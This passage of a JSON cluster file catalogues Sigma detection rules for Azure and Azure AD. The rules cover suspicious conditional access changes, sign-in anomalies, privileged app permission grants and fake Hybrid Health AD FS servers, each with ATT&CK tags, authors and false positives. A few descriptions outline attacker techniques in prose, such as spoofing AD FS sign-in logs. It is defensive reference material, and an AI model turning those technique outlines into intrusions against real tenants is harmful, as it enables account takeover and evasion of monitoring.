server.\nThis can be done programmatically via HTTP requests to Azure.\n", - "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", - "value": "Azure Active Directory Hybrid Health AD FS New Server", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578" - ], - "creation_date": "2021/08/26", - "filename": "azure_aadhybridhealth_adfs_new_server.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Legitimate AD FS servers added to an AAD Health AD FS service instance" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", - "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", - "value": "Azure Active Directory Hybrid Health AD FS Service Delete", - "meta": { - "refs": [ - "https://o365blog.com/post/hybridhealthagent/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1578.003" - ], - "creation_date": "2021/08/26", - "filename": "azure_aadhybridhealth_adfs_service_delete.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", - "level": "medium", - "falsepositive": [ - "Legitimate AAD Health AD FS service instances being deleted in a tenant" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", - "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", - "value": "CA Policy Removed by Non Approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/19", - "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", - "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", - "value": "CA Policy Updated by Non Approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/19", - "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert on conditional access changes.", - "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", - "value": "New CA Policy by Non-approved Actor", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548" - ], - "creation_date": "2022/07/18", - "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "medium", - "falsepositive": [ - "Misconfigured role permissions", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", - "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", - "value": "Sign-in Failure Bad Password Threshold", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/04/21", - "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", - "author": "Corissa Koopmans, '@corissalea'", - "level": "high", - "falsepositive": [ - "Failed Azure AD Connect Synchronization", - "Service account use with an incorrect password specified", - "Misconfigured systems", - "Vulnerability scanners" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", - "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", - "value": "Account Lockout", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2021/10/10", - "filename": "azure_account_lockout.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an account was created and deleted in a short period of time.", - "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", - "value": "Account Created And Deleted Within A Close Time Frame", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_account_created_deleted.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "level": "high", - "falsepositive": [ - "Legit administrative action" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect successful authentications from countries you do not operate out of.", - "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", - "value": "Successful Authentications From Countries You Do Not Operate Out Of", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when sign-ins increased by 10% or greater.", - "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", - "value": "Increased Failed Authentications Of Any Type", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_auth_failure_increase.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when successful sign-ins increased by 10% or greater.", - "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", - "value": "Measurable Increase Of Successful Authentications", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/08/11", - "filename": "azure_ad_auth_sucess_increase.yml", - "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", - "level": "low", - "falsepositive": [ - "Increase of users in the environment" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when authentications to important application(s) only required single-factor authentication", - "uuid": "f272fb46-25f2-422c-b667-45837994980f", - "value": "Authentications To Important Apps Using Single Factor Authentication", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for Bitlocker key retrieval.", - "uuid": "a0413867-daf3-43dd-9245-734b3a787942", - "value": "Bitlocker Key Retrieval", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_bitlocker_key_retrieval.yml", - "author": "Michael Epping, '@mepples21'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for device registration or join events where MFA was not performed.", - "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", - "value": "Device Registration or Join Without MFA", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_device_registration_or_join_without_mfa.yml", - "author": "Michael Epping, '@mepples21'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for changes to the device registration policy.", - "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", - "value": "Changes to Device Registration Policy", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_device_registration_policy_changes.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect failed authentications from countries you do not operate out of.", - "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", - "value": "Failed Authentications From Countries You Do Not Operate Out Of", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "low", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects guest users being invited to tenant by non-approved inviters", - "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", - "value": "Guest Users Invited To Tenant By Non Approved Inviters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when users are authenticating without MFA being required.", - "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", - "value": "Azure AD Only Single Factor Authentication Required", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/27", - "filename": "azure_ad_only_single_factor_auth_required.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "low", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for sign-ins where the device was non-compliant.", - "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", - "value": "Sign-ins from Non-Compliant Devices", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", - "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", - "value": "Sign-ins by Unknown Devices", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_sign_ins_from_unknown_devices.yml", - "author": "Michael Epping, '@mepples21'", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for users added to device admin roles.", - "uuid": "11c767ae-500b-423b-bae3-b234450736ed", - "value": "Users Added to Global or Device Admin Roles", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_users_added_to_device_admin_roles.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "User Added to an Administrator's Azure AD Role", - "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", - "value": "User Added to an Administrator's Azure AD Role", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1098/003/", - "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098.003" - ], - "creation_date": "2021/10/04", - "filename": "azure_ad_user_added_to_admin_role.yml", - "author": "Rapha\u00ebl CALVET, @MetallicHack", - "level": "medium", - "falsepositive": [ - "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application is deleted in Azure.", - "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", - "value": "Azure Application Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_application_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Application being deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application gateway is modified or deleted.", - "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", - "value": "Azure Application Gateway Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_application_gateway_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application gateway being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application security group is modified or deleted.", - "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", - "value": "Azure Application Security Group Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_application_security_group_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application security group being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a configuration change is made to an applications AppID URI.", - "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", - "value": "Application AppID Uri Configuration Changes", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_appid_uri_changes.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", - "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", - "value": "Added Credentials to Existing Application", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ], - "creation_date": "2022/05/26", - "filename": "azure_app_credential_added.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When credentials are added/removed as part of the normal working hours/workflows" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application credential is modified.", - "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", - "value": "Azure Application Credential Modified", - "meta": { - "refs": [ - "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/02", - "filename": "azure_app_credential_modification.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Application credential added may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", - "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", - "value": "Delegated Permissions Granted For All Users", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_delegated_permissions_all_users.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", - "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", - "value": "Application Using Device Code Authentication Flow", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ], - "creation_date": "2022/06/01", - "filename": "azure_app_device_code_authentication.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "Applications that are input constrained will need to use device code flow and are valid authentications." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an end user consents to an application", - "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", - "value": "End User Consent", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_end_user_consent.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when end user consent is blocked due to risk-based consent.", - "uuid": "7091372f-623c-4293-bc37-20c32b3492be", - "value": "End User Consent Blocked", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/10", - "filename": "azure_app_end_user_consent_blocked.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", - "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", - "value": "Added Owner To Application", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access", - "attack.defense_evasion" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_owner_added.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "When a new application owner is added by an administrator" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when app permissions (app roles) for other APIs are granted", - "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", - "value": "App Permissions Granted For Other APIs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_permissions_for_api.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", - "uuid": "c1d147ae-a951-48e5-8b41-dcd0170c7213", - "value": "App Granted Microsoft Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/10", - "filename": "azure_app_permissions_msft.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", - "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", - "value": "App Granted Privileged Delegated Or App Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_privileged_permissions.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "microsoft365portal" - } - }, - { - "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", - "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", - "value": "App Role Added", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/19", - "filename": "azure_app_role_added.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", - "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", - "value": "Applications That Are Using ROPC Authentication Flow", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ], - "creation_date": "2022/06/01", - "filename": "azure_app_ropc_authentication.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a configuration change is made to 